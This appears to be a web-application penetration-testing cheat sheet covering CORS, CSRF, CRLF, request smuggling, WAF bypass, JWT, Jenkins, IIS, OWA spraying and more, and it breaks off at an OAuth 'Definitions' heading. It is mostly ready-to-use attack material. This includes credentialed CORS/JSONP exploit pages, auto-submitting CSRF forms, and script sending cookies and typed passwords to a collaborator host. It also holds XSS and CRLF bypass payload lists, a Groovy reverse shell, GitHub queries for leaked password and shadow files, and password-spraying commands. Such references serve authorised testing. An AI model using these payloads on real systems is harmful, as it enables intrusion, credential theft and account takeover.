In GET URL append “?callback=testjsonp”
Response should be:
testjsonp(<json-data>)

CORS PoC

<!DOCTYPE html>
<html>
<head>
<title>CORS PoC Exploit</title>
</head>
<body>
<center>

<h1>CORS Exploit<br>six2dez</h1>
<hr>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script type="text/javascript">
 function cors() {
   var xhttp = new XMLHttpRequest();
   xhttp.onreadystatechange = function() {
     if(this.readyState == 4 && this.status == 200) {
        document.getElementById("demo").innerHTML = this.responseText;
     }
   };
 xhttp.open("GET", "http://<vulnerable-url>", true);
 xhttp.withCredentials = true;
 xhttp.send();
 }
</script>

</center>
</body>
</html>

CORS PoC 2

<html>
<script>
var http = new XMLHttpRequest();
var url = 'Url';//Paste here Url
var params = 'PostData';//Paste here POST data
http.open('POST', url, true);

//Send the proper header information along with the request
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

http.onreadystatechange = function() {//Call a function when the state changes.
    if(http.readyState == 4 && http.status == 200) {
        alert(http.responseText);
    }
}
http.send(params);

</script>
</html>

CORS JSON PoC

<!DOCTYPE html>
<html>
<head>
<title>JSONP PoC</title>
</head>
<body>
<center>

<h1>JSONP Exploit<br>secureITmania</h1>
<hr>
<div id="demo">
<button type="button" onclick="trigger()">Exploit</button>
</div>
<script>

function testjsonp(myObj) {
  var result = JSON.stringify(myObj)
  document.getElementById("demo").innerHTML = result;
  //console.log(myObj)
}

</script>

<script >

  function trigger() {
    var s = document.createElement("script");
    s.src = "https://<vulnerable-endpoint>?callback=testjsonp";
    document.body.appendChild(s);
}

</script>
</body>
</html>

CSRF

Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform.

3 conditions:
• A relevant action
• Cookie-based session handling
• No unpredictable request parameters

Vulnerable request example:
__
POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=yvthwsztyeQkAPzeQ5gHgTvlyxHfsAfE

email=wiener@normal-user.com
__

HTML with attack:
__
<html>
  <body>
    <form action="https://vulnerable-website.com/email/change" method="POST">
      <input type="hidden" name="email" value="pwned@evil-user.net" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
__

Exploit CSRF in POST:

With your browser proxying traffic through Burp Suite, log in to your account, submit the "Change email" form, and find the resulting request in your Proxy history.
If you're using Burp Suite Professional, right-click on the request, and from the context menu select Engagement tools / Generate CSRF PoC. Enable the option to include an auto-submit script and click "Regenerate".

Exploit CSRF in GET:
<img src="https://vulnerable-website.com/email/change?email=pwned@evil-user.net">

- SameSite cookie property avoid the attack:
   → Only from same site:
    SetCookie: SessionId=sYMnfCUrAlmqVVZn9dqevxyFpKZt30NN; SameSite=Strict; 
   → From other site only if GET and requested by click, not scripts (vulnerable if CSRF in GET or POST converted to GET):    
    SetCookie: SessionId=sYMnfCUrAlmqVVZn9dqevxyFpKZt30NN; SameSite=Lax; 


<script>
fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

Json CSRF

Requirements:

1. The authentication mechanism should be in the cookie-based model. (By default cookie-based authentication is vulnerable to CSRF attacks)
2. The HTTP request should not be fortify by the custom random token on the header as well in the body.(X-Auth-Token)
3. The HTTP request should not be fortify by the Same Origin Policy.

Bypass 2 & 3:
• Change the request method to GET append the body as query parameter.
• Test the request without the Customized Token (X-Auth-Token) and also header.
• Test the request with exact same length but different token.

If post is not allowed, can try with URL/param?_method=PUT


<body onload='document.forms[0].submit()'>
<form action="https://<vulnerable-url>?_method=PUT" method="POST" enctype="text/plain">
  <input type="text" name='{"username":"blob","dummy":"' value='"}'>
  <input type="submit" value="send">
</form>

<!---This results in a request body of:
{"username":"blob", "dummy": "="} -->

CSRF Token Bypass

CSRF Tokens

Unpredictable value generated from the server to the client, when a second request is made, server validate this token and reject the request if is missing or invalid. Prevent CSRF attack because the malicious HTTP request formed can't know the CSRF Token generated for the victim.
   → Is transmited to the client through a hidden field:


- Example:
    __
    POST /email/change HTTP/1.1
    Host: vulnerable-website.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 68
    Cookie: session=2yQIDcpia41WrATfjPqvm9tOkDvkMvLm

    csrf=WfF1szMUHhiokx9AHFply5L2xAOfjRkE&email=wiener@normal-user.com
    __

- Validation depends on method (usually POST):
    __
    GET /email/change?email=pwned@evil-user.net HTTP/1.1
    Host: vulnerable-website.com
    Cookie: session=2yQIDcpia41WrATfjPqvm9tOkDvkMvLm
    __

- Validation depend on token is present (if not, validation is skipped):
    --
    POST /email/change HTTP/1.1
    Host: vulnerable-website.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 25
    Cookie: session=2yQIDcpia41WrATfjPqvm9tOkDvkMvLm

    email=pwned@evil-user.net
    --
- CSRF not tied to user session

- CSRF tied to a non-session cookie:
    --
    POST /email/change HTTP/1.1
    Host: vulnerable-website.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 68
    Cookie: session=pSJYSScWKpmC60LpFOAHKixuFuM4uXWF; csrfKey=rZHCnSzEp8dbI6atzagGoSYyqJqTz5dv

    csrf=RhV7yQDO0xcq9gLEah2WVbmuFqyOq7tY&email=wiener@normal-user.com
    --

- CSRF token duplicated in cookie:
    --
    POST /email/change HTTP/1.1
    Host: vulnerable-website.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 68
    Cookie: session=1DQGdzYbOJQzLP7460tfyiv3do7MjyPw; csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa

    csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa&email=wiener@normal-user.com
    --

- Validation of referer depends on header present (if not, validation is skipped)

- Circumvent referer validation (if only checks the domain existence)

Web cache poisoning

**Tools**
https://github.com/s0md3v/Arjun
python3 arjun.py -u https://url.com --get 
python3 arjun.py -u https://url.com --post

https://portswigger.net/research/practical-web-cache-poisoning

Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users.

Fundamentally, web cache poisoning involves two phases. First, the attacker must work out how to elicit a response from the back-end server that inadvertently contains some kind of dangerous payload. Once successful, they need to make sure that their response is cached and subsequently served to the intended victims.

A poisoned web cache can potentially be a devastating means of distributing numerous different attacks, exploiting vulnerabilities such as XSS, JavaScript injection, open redirection, and so on.

- XSS for users accessing /en?region=uk:
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"

Broken Links

**Tools** 
https://github.com/stevenvachon/broken-link-checker 
blc -rfoi --exclude linkedin.com --exclude youtube.com --filter-level 3 https://example.com/

Virtual Hosts

**Tools** 
https://github.com/jobertabma/virtual-host-discovery
ruby scan.rb --ip=192.168.1.101 --host=domain.tld

ClickJacking

Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking on some other content in a decoy website.

- Preventions:
   → X-Frame-Options: deny/sameorigin/allow-from
   → CSP: policy/frame-ancestors ‘none/self/website.com’

 An example using the style tag and parameters is as follows:
<head>
  <style>
    #target_website {
      position:relative;
      width:128px;
      height:128px;
      opacity:0.00001;
      z-index:2;
      }
    #decoy_website {
      position:absolute;
      width:300px;
      height:400px;
      z-index:1;
      }
  </style>
</head>
...
<body>
  <div id="decoy_website">
  ...decoy web content here...
  </div>
  <iframe id="target_website" src="https://vulnerable-website.com">
  </iframe>
</body>

The target website iframe is positioned within the browser so that there is a precise overlap of the target action with the decoy website using appropriate width and height position values. Absolute and relative position values are used to ensure that the target website accurately overlaps the decoy regardless of screen size, browser type and platform. The z-index determines the stacking order of the iframe and website layers. The opacity value is defined as 0.0 (or close to 0.0) so that the iframe content is transparent to the user. Browser clickjacking protection might apply threshold-based iframe transparency detection (for example, Chrome version 76 includes this behavior but Firefox does not). The attacker selects opacity values so that the desired effect is achieved without triggering protection behaviors.

Request smuggling

HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users.

Request smuggling attacks involve placing both the Content-Length header and the Transfer-Encoding header into a single HTTP request and manipulating these so that the front-end and back-end servers process the request differently. The exact way in which this is done depends on the behavior of the two servers:

Most HTTP request smuggling vulnerabilities arise because the HTTP specification provides two different ways to specify where a request ends: the Content-Length header and the Transfer-Encoding header.

- The Content-Length header is straightforward: it specifies the length of the message body in bytes. For example:

    POST /search HTTP/1.1
    Host: normal-website.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 11

    q=smuggling

- The Transfer-Encoding header can be used to specify that the message body uses chunked encoding. This means that the message body contains one or more chunks of data. Each chunk consists of the chunk size in bytes (expressed in hexadecimal), followed by a newline, followed by the chunk contents. The message is terminated with a chunk of size zero. For example:

    POST /search HTTP/1.1
    Host: normal-website.com
    Content-Type: application/x-www-form-urlencoded
    Transfer-Encoding: chunked

    b
    q=smuggling
    0



• CL.TE: the front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.
   ◇ Find - time delay:
    POST / HTTP/1.1
    Host: vulnerable-website.com
    Transfer-Encoding: chunked
    Content-Length: 4

    1
    A
    X
• TE.CL: the front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header.
   ◇ Find time delay:
    POST / HTTP/1.1
    Host: vulnerable-website.com
    Transfer-Encoding: chunked
    Content-Length: 6

    0

    X
• TE.TE: the front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.

- CL.TE
    Using Burp Repeater, issue the following request twice:
    POST / HTTP/1.1
    Host: your-lab-id.web-security-academy.net
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 6
    Transfer-Encoding: chunked

    0

    G
    The second response should say: Unrecognized method GPOST.

 - TE.CL
    In Burp Suite, go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.
    Using Burp Repeater, issue the following request twice:
    POST / HTTP/1.1
    Host: your-lab-id.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Content-length: 4
    Transfer-Encoding: chunked

    5c
    GPOST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15

    x=1
    0

 - TE.TE: obfuscating TE Header
     In Burp Suite, go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.
    Using Burp Repeater, issue the following request twice:
    POST / HTTP/1.1
    Host: your-lab-id.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Content-length: 4
    Transfer-Encoding: chunked
    Transfer-encoding: cow

    5c
    GPOST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15

    x=1
    0

Web Sockets

WebSockets are a bi-directional, full duplex communications protocol initiated over HTTP. They are commonly used in modern web applications for streaming data and other asynchronous traffic.

WebSocket connections are normally created using client-side JavaScript like the following:
var ws = new WebSocket("wss://normal-website.com/chat");

To establish the connection, the browser and server perform a WebSocket handshake over HTTP. The browser issues a WebSocket handshake request like the following:
GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket

If the server accepts the connection, it returns a WebSocket handshake response like the following:
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=

Several features of the WebSocket handshake messages are worth noting:
• The Connection and Upgrade headers in the request and response indicate that this is a WebSocket handshake.
• The Sec-WebSocket-Version request header specifies the WebSocket protocol version that the client wishes to use. This is typically 13.
• The Sec-WebSocket-Key request header contains a Base64-encoded random value, which should be randomly generated in each handshake request.
• The Sec-WebSocket-Accept response header contains a hash of the value submitted in the Sec-WebSocket-Key request header, concatenated with a specific string defined in the protocol specification. This is done to prevent misleading responses resulting from misconfigured servers or caching proxies.

CRLF

**Tools**
https://github.com/random-robbie/CRLF-Injection-Scanner
crlf_scan.py -i <inputfile> -o <outputfile>

The following simplified example uses CRLF to:

1. Add a fake HTTP response header: Content-Length: 0. This causes the web browser to treat this as a terminated response and begin parsing a new response.
2. Add a fake HTTP response: HTTP/1.1 200 OK. This begins the new response.
3. Add another fake HTTP response header: Content-Type: text/html. This is needed for the web browser to properly parse the content.
4. Add yet another fake HTTP response header: Content-Length: 25. This causes the web browser to only parse the next 25 bytes.
5. Add page content with an XSS: <script>alert(1)</script>. This content has exactly 25 bytes.
6. Because of the Content-Length header, the web browser ignores the original content that comes from the web server.

    http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E

- Cloudflare CRLF bypass
<iframe src=”%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)”>

Payload list:

/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:crlf=injection
/%23%0aSet-Cookie:crlf=injection
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection

IDOR

Check for valuable words:
{regex + perm} id
{regex + perm} user
{regex + perm} account
{regex + perm} number
{regex + perm} order
{regex + perm} no
{regex + perm} doc
{regex + perm} key
{regex + perm} email
{regex + perm} group
{regex + perm} profile
{regex + perm} edit

Web Services

GraphQL

**Tools** 
https://github.com/doyensec/inql
https://github.com/swisskyrepo/GraphQLmap

Past schema here: https://apis.guru/graphql-voyager/

To test a server for GraphQL introspection misconfiguration: 
1) Intercept the HTTP request being sent to the server 
2) Replace its post content / query with a generic introspection query to fetch the entire backend schema 
3) Visualize the schema to gather juicy API calls. 
4) Craft any potential GraphQL call you might find interesting and HACK away!

example.com/graphql?query={__schema%20{%0atypes%20{%0aname%0akind%0adescription%0afields%20{%0aname%0a}%0a}%0a}%0a}

JS

# LinkFinder
# https://github.com/GerbenJavado/LinkFinder
python linkfinder.py -i https://example.com -d
python linkfinder.py -i burpfile -b

# JSScanner
# https://github.com/dark-warlord14/JSScanner
# https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/
bash install.sh
# Configure domain in alive.txt
bash script.sh
cat js/*
cd db && grep -oriahE "https?://[^\"\\'> ]+"

.NET

**Tools** 
https://github.com/icsharpcode/ILSpy
https://github.com/0xd4d/dnSpy

JWT

**Tools** 
https://github.com/ticarpi/jwt_tool
https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology
https://jwt.io/

1. Leak Sensitive Info
2. Send without signature
3. Change algorythm r to h
4. Crack the secret h256
5. KID manipulation

eyJhbGciOiJIUzUxMiJ9.eyJleHAiOjE1ODQ2NTk0MDAsInVzZXJuYW1lIjoidGVtcHVzZXI2OSIsInJvbGVzIjpbIlJPTEVfRVhURVJOQUxfVVNFUiJdLCJhcHBDb2RlIjoiQU5UQVJJX0FQSSIsImlhdCI6MTU4NDU3MzAwMH0.AOHXCcMFqYFeDSYCEjeugT26RaZLzPldqNAQSlPNpKc2JvdTG9dr2ini4Z42dd5xTBab-PYBvlXIJetWXOX80A

https://trustfoundry.net/jwt-hacking-101/
https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9
https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/
https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a

- Crack
pip install PyJWT
https://github.com/Sjord/jwtcrack
https://raw.githubusercontent.com/Sjord/jwtcrack/master/jwt2john.py
jwt2john.py JWT
./john /tmp/token.txt --wordlist=wordlist.txt

- Wordlist generator crack tokens:
https://github.com/dariusztytko/token-reverser

Github

**Tools**

# GitDumper 
  https://github.com/internetwache/GitTools
  If we have access to .git folder: 
  ./gitdumper.sh http://example.com/.git/ /home/user/dump/ 
  git cat-file --batch-check --batch-all-objects | grep blob git cat-file -p HASH
# GitGot 
  https://github.com/BishopFox/GitGot
  ./gitgot.py --gist -q CompanyName./gitgot.py -q '"example.com"'./gitgot.py -q "org:github cats"
# GitRob https://github.com/michenriksen/gitrob
  gitrob website.com
# GitHound https://github.com/tillson/git-hound 
  echo "domain.com" | githound --dig --many-results --languages common-languages.txt --threads 100
* GitGrabber https://github.com/hisxo/gitGraber
* SSH GIT https://shhgit.darkport.co.uk/
# GithubSearch
  https://github.com/gwen001/github-search
# Trufflehog
trufflehog https://github.com/company/repo

* GitMiner [https://github.com/UnkL4b/GitMiner](https://github.com/UnkL4b/GitMiner)
* wordpress configuration files with passwords
  python3 gitminer-v2.0.py -q 'filename:wp-config extension:php FTP\_HOST in:file ' -m wordpress -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4 -o result.txt
* brasilian government files containing passwords
  python3 gitminer-v2.0.py --query 'extension:php "root" in:file AND "gov.br" in:file' -m senhas -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4
* shadow files on the etc paste
  python3 gitminer-v2.0.py --query 'filename:shadow path:etc' -m root -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4
* joomla configuration files with passwords 
  python3 gitminer-v2.0.py --query 'filename:configuration extension:php "public password" in:file' -m joomla -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4
  
  
sudo docker pull zricethezav/gitleaks
sudo docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git

Then visualize a commit:
https://github.com/[git account]/[repo name]/commit/[commit ID]
https://github.com/zricethezav/gitleaks/commit/744ff2f876813fbd34731e6e0d600e1a26e858cf

# Manual local checks inside repository
git log
# Checkout repo with .env file
git checkout f17a07721ab9acec96aef0b1794ee466e516e37a
ls -la
cat .env

GitLab

If you find GitLab login panel, try to go to:
/explore
Then use the searchbar for users,passwords,keys...

WAFs

**Tools**

whatwaf https://example.com
wafw00f https://example.com
# bypass-firewalls-by-DNS-history
# https://github.com/vincentcox/bypass-firewalls-by-DNS-history
  bash bypass-firewalls-by-DNS-history.sh -d example.com

# Good bypass payload:
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)
javascript:”/*’/*`/* →<html \” onmouseover=/*&lt;svg/*/onload=alert()//>

# Bypass trying to access to :
dev.domain.com
stage.domain.com
ww1/ww2/ww3...domain.com
www.domain.uk/jp/

# Akamai
origin.sub.domain.com
origin-sub.domain.com
- Send header:
Pragma: akamai-x-get-true-cache-key
{{constructor.constructor(alert`1`)()}}

# Cloudflare
python3 cloudflair.py domain.com
# https://github.com/mandatoryprogrammer/cloudflare_enum
cloudflare_enum.py disney.com
https://viewdns.info/iphistory/?domain=domain.com
https://whoisrequest.com/history/

# Cloudflare bypasses
<!<script>alert(1)</script>
<a href=”j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this[‘document’][‘cookie’]&rpar;”>X</a>
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert'1';>
<select><noembed></select><script x='a@b'a>y='a@b'//a@b%0a\u0061lert(1)</script x>
<a+HREF=’%26%237javascrip%26%239t:alert%26lpar;document.domain)’>

# DNS History
https://whoisrequest.com/history/

# Imperva 
https://medium.com/@0xpegg/imperva-waf-bypass-96360189c3c5
url.com/search?search=%3E%3C/span%3E%3Cp%20onmouseover=%27p%3D%7E%5B%5D%3Bp%3D%7B%5F%5F%5F%3A%2B%2Bp%2C%24%24%24%24%3A%28%21%5B%5D%2B%22%22%29%5Bp%5D%2C%5F%5F%24%3A%2B%2Bp%2C%24%5F%24%5F%3A%28%21%5B%5D%2B%22%22%29%5Bp%5D%2C%5F%24%5F%3A%2B%2Bp%2C%24%5F%24%24%3A%28%7B%7D%2B%22%22%29%5Bp%5D%2C%24%24%5F%24%3A%28p%5Bp%5D%2B%22%22%29%5Bp%5D%2C%5F%24%24%3A%2B%2Bp%2C%24%24%24%5F%3A%28%21%22%22%2B%22%22%29%5Bp%5D%2C%24%5F%5F%3A%2B%2Bp%2C%24%5F%24%3A%2B%2Bp%2C%24%24%5F%5F%3A%28%7B%7D%2B%22%22%29%5Bp%5D%2C%24%24%5F%3A%2B%2Bp%2C%24%24%24%3A%2B%2Bp%2C%24%5F%5F%5F%3A%2B%2Bp%2C%24%5F%5F%24%3A%2B%2Bp%7D%3Bp%2E%24%5F%3D%28p%2E%24%5F%3Dp%2B%22%22%29%5Bp%2E%24%5F%24%5D%2B%28p%2E%5F%24%3Dp%2E%24%5F%5Bp%2E%5F%5F%24%5D%29%2B%28p%2E%24%24%3D%28p%2E%24%2B%22%22%29%5Bp%2E%5F%5F%24%5D%29%2B%28%28%21p%29%2B%22%22%29%5Bp%2E%5F%24%24%5D%2B%28p%2E%5F%5F%3Dp%2E%24%5F%5Bp%2E%24%24%5F%5D%29%2B%28p%2E%24%3D%28%21%22%22%2B%22%22%29%5Bp%2E%5F%5F%24%5D%29%2B%28p%2E%5F%3D%28%21%22%22%2B%22%22%29%5Bp%2E%5F%24%5F%5D%29%2Bp%2E%24%5F%5Bp%2E%24%5F%24%5D%2Bp%2E%5F%5F%2Bp%2E%5F%24%2Bp%2E%24%3Bp%2E%24%24%3Dp%2E%24%2B%28%21%22%22%2B%22%22%29%5Bp%2E%5F%24%24%5D%2Bp%2E%5F%5F%2Bp%2E%5F%2Bp%2E%24%2Bp%2E%24%24%3Bp%2E%24%3D%28p%2E%5F%5F%5F%29%5Bp%2E%24%5F%5D%5Bp%2E%24%5F%5D%3Bp%2E%24%28p%2E%24%28p%2E%24%24%2B%22%5C%22%22%2Bp%2E%24%5F%24%5F%2B%28%21%5B%5D%2B%22%22%29%5Bp%2E%5F%24%5F%5D%2Bp%2E%24%24%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5F%24%5F%2Bp%2E%5F%5F%2B%22%28%5C%5C%5C%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%5F%2Bp%2E%24%24%24%5F%2B%28%21%5B%5D%2B%22%22%29%5Bp%2E%5F%24%5F%5D%2B%28%21%5B%5D%2B%22%22%29%5Bp%2E%5F%24%5F%5D%2Bp%2E%5F%24%2B%22%2C%5C%5C%22%2Bp%2E%24%5F%5F%2Bp%2E%5F%5F%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%24%2Bp%2E%5F%24%5F%2Bp%2E%24%5F%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%24%24%5F%2Bp%2E%24%5F%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%5F%24%5F%2Bp%2E%5F%24%24%2Bp%2E%24%24%5F%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5F%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%5F%24%2Bp%2E%5F%5F%24%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5F%5F%5F%2Bp%2E%5F%5F%2B%22%5C%5C%5C%22%5C%5C%22%2Bp%2E%24%5F%5F%2Bp%2E%5F%5F%5F%2B%22%29%22%2B%22%5C%22%22%29%28%29%29%28%29%3B%27%3E

# FAIL2BAN SQLi
(SELECT 6037 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(6037=6037,1))),0x717a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Firebird

**Tools** 
https://github.com/InfosecMatter/Scripts/blob/master/firebird-bruteforce.sh 
./firebird\_bruteforce.sh IP DB /PATH/pwdlist.txt

https://www.infosecmatter.com/firebird-database-exploitation/
apt-get -y install firebird3.0-utils
isql-fb

Wordpress

wpscan --url https://url.com
wpscan --url <domain> --enumerate ap at # All Plugins, All Themes
wpscan --url <domain> --enumerate u # Usernames
wpscan --url <domain> --enumerate v
vulnx -u https://example.com/ --cms --dns -d -w -e
python3 cmsmap.py https://www.example.com -F

Check IP behing WAF:
https://blog.nem.ec/2020/01/22/discover-cloudflare-wordpress-ip/

# SQLi in WP and can't crack users hash:
1. Request password reset.
2. Go to site.com/wp-login.php?action=rp&key={ACTIVATION_KEY}&login={USERNAME}

# XMLRPC

pingback.xml:
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
 <param>
  <value>
   <string>http://10.0.0.1/hello/world</string>
  </value>
 </param>
 <param>
  <value>
   <string>https://10.0.0.1/hello/world/</string>
  </value>
 </param>
</params>
</methodCall>

curl -X POST -d @pingback.xml https://exmaple.com/xmlrpc.php

Evidence xmlrpc:
curl -d '<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>demo.sayHello</methodName><params/></methodCall>' -k https://example.com/xmlrpc.php

Enum User:
for i in {1..50}; do curl -s -L -i https://example.com/wordpress?author=$i | grep -E -o "Location:.*" | awk -F/ '{print $NF}'; done

Webdav

davtest -cleanup -url http://target
cadaver http://target

Joomla

# Joomscan
joomscan -u  http://10.11.1.111 
joomscan -u  http://10.11.1.111 --enumerate-components

python3 cmseek.py -u domain.com
vulnx -u https://example.com/ --cms --dns -d -w -e
python3 cmsmap.py https://www.example.com -F

Jenkins

JENKINSIP/PROJECT//securityRealm/user/admin

JENKINSIP/jenkins/script

Groovy RCE
def process = "cmd /c whoami".execute();println "${process.text}";

Groovy RevShell

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

IIS

# ViewState:
https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC

# WebResource.axd:
https://github.com/inquisb/miscellaneous/blob/master/ms10-070_check.py

# ShortNames
https://github.com/irsdl/IIS-ShortName-Scanner
java -jar iis_shortname_scanner.jar 2 20 http://domain.es

# Padding Oracle Attack:
# https://github.com/KishanBagaria/padding-oracle-attacker
npm install --global padding-oracle-attacker
padding-oracle-attacker decrypt  hex:   [options]
padding-oracle-attacker decrypt  b64:   [options]
padding-oracle-attacker encrypt              [options]
padding-oracle-attacker encrypt  hex:    [options]
padding-oracle-attacker analyze  [] [options]

# Look for web.config or web.xml
https://x.x.x.x/.//WEB-INF/web.xml

# ASP - force error paths
/con/
/aux/
con.aspx
aux.aspx

Firebase

# https://github.com/Turr0n/firebase
python3 firebase.py -p 4 --dnsdumpster -l file

# https://github.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit

OWA

**Tools**

* MailSniper - [https://github.com/dafthack/MailSniper](https://github.com/dafthack/MailSniper)
* UserName Recon/Password Spraying - [http://www.blackhillsinfosec.com/?p=4694](http://www.blackhillsinfosec.com/?p=4694)
* Password Spraying MFA/2FA - [http://www.blackhillsinfosec.com/?p=5089](http://www.blackhillsinfosec.com/?p=5089)
* Password Spraying/GlobalAddressList - [http://www.blackhillsinfosec.com/?p=5330](http://www.blackhillsinfosec.com/?p=5330)
* Outlook 2FA Bypass - [http://www.blackhillsinfosec.com/?p=5396](http://www.blackhillsinfosec.com/?p=5396)
* Malicious Outlook Rules - [https://silentbreaksecurity.com/malicious-outlook-rules/](https://silentbreaksecurity.com/malicious-outlook-rules/)
* Outlook Rules in Action - [http://www.blackhillsinfosec.com/?p=5465](http://www.blackhillsinfosec.com/?p=5465)
* Spraying toolkit: [https://github.com/byt3bl33d3r/SprayingToolkit](https://github.com/byt3bl33d3r/SprayingToolkit)

Name Conventions:
- FirstnameLastinitial
- FirstnameLastname
- Lastname.firstname

# Password spraying:
Invoke-PasswordSprayOWA -ExchHostName mail.r-1x.com -UserList C:\users.txt -Password Dakota2019! -OutFile C:\creds.txt -Threads 10
python3 atomizer.py owa mail.r-1x.com 'Dakota2019!' ../users.txt

VHosts

**Tools** 
https://github.com/codingo/VHostScan
https://github.com/jobertabma/virtual-host-discovery

OAuth

Explanation

OAuth 2.0
https://oauth.net/2/
https://oauth.net/2/grant-types/authorization-code/

Flow:

1. MyWeb tried integrate with Twitter.
2. MyWeb request to Twitter if you authorize.
3. Prompt with a consent.
4. Once accepted Twitter send request redirect_uri with code and state.
5. MyWeb take code and it's own client_id and client_secret and ask server for access_token.
6. MyWeb call Twitter API with access_token.

Definitions:

